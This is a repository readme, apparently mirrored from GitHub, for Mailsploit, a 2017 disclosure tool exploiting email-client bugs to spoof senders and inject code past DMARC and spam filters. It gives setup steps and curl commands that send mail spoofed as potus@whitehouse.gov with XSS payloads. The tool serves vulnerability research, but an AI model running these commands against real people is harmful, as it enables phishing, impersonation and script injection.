pl12133 / Mailsploit

(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.

Home Page:https://mailsploit.com

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Mailsploit logo

Mailsploit Server

How to install

  1. Clone the repository
  2. Edit originalFrom in src/main/Config.ts with your email address.
  3. Run the following commands in the terminal:
yarn install && yarn dist # Require yarn

How to launch the web server

  1. Run the following commands in the terminal:
# First configure the environment
export MAILSPLOIT_HOST=[SMTP Server Hostname]
export MAILSPLOIT_PORT=[SMTP Server Port (default 465)]
export MAILSPLOIT_USERNAME=[SMTP Server Username]
export MAILSPLOIT_PASSWORD=[SMTP Server Password]
export MAILSPLOIT_IGNORE_TLS=[Boolean - Ignore self signed certificates]
npm run build && npm start
  1. That's it. The server will run on localhost:8081

How to use it

You can do a POST request containing sender, receiver and options (from 0 to 13) parameters to the /process endpoint.

Example using cURL (payload 3 without XSS):

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&options=2"

or, all the payloads with XSS:

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&xss=true&options=-1"

All the payloads are available here.

About

(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.

https://mailsploit.com


Languages

Language:TypeScript 100.0%